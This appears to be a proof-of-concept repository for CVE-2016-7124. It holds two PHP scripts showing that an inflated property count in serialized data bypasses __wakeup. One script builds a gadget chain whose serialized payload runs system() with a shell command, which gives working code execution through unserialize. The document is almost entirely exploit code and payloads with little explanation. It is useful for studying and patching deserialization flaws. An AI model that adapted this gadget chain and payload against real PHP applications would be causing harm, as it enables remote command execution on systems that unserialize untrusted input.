CVE-2016-7124-PHP8

poc.php

#!/usr/bin/env php
<?php
class Fun{
    private $func = 'call_user_func_array';
    public function __call($f,$p){
        call_user_func($this->func,$f,$p);
    }
    public function __wakeup(){
        $this->func = '';
        echo "Don't serialize me\n";
    }
}

class A{
    public $a;
    public function __get($p){
        return $this->a->$p();
    }
}

class B{
    public $p;
    public function __destruct(){
        $p = $this->p;
        echo $this->a->$p;
    }
}

$pop = <<<EOF
O:1:"B":2:{s:1:"p";s:13:"php --version";s:1:"a";O:1:"A":1:{s:1:"a";O:3:"Fun":1:{s:4:"func";s:6:"system";}}}
EOF;

try {
    echo "********** normal **********\n\n$pop\n\n";
    var_dump(unserialize($pop));
} catch (Throwable $e) {
    echo "\n", $e->getMessage(), "\n\n";
}

try {
    echo "********* bad **********\n\n\n$pop\n\n";
    $pop = str_replace('"Fun":1', '"Fun":2', $pop);
    var_dump(unserialize($pop));
} catch (Throwable $e) {
    echo "\n", $e->getMessage(), "\n\n";
}

poc2.php

#!/usr/bin/env php
<?php
class A {
    private $name = 'hello';

    public function setName($name) {
        $this->name = $name;
    }

    public function __destruct() {
        echo "A::__destruct()\n";
        echo $this->name, "\n";
    }
}

class B {
    private $name = 'world';

    public function setName($name) {
        $this->name = $name;
    }

    public function __toString() {
        return $this->name;
    }

    public function __wakeup() {
        echo "B::__wakeup()\n";
        $this->setName('no unserialize');
    }
}

echo "----------- normal -----------\n";
$a = new A();
$a->setName(new B());
echo str_replace("\0", '\0', serialize($a)), "\n";
var_dump($a);
$a = null;

echo "----------- normal -----------\n";
$a2 = unserialize(<<<EOF
O:1:"A":1:{s:7:"\0A\0name";O:1:"B":1:{s:7:"\0B\0name";s:5:"pwned";}}
EOF);
var_dump($a2);
$a2 = null;

echo "----------- bad -----------\n";
$a3 = unserialize(<<<EOF
O:1:"A":1:{s:7:"\0A\0name";O:1:"B":2:{s:7:"\0B\0name";s:5:"pwned";}}
EOF);
var_dump($a3);
$a3 = null;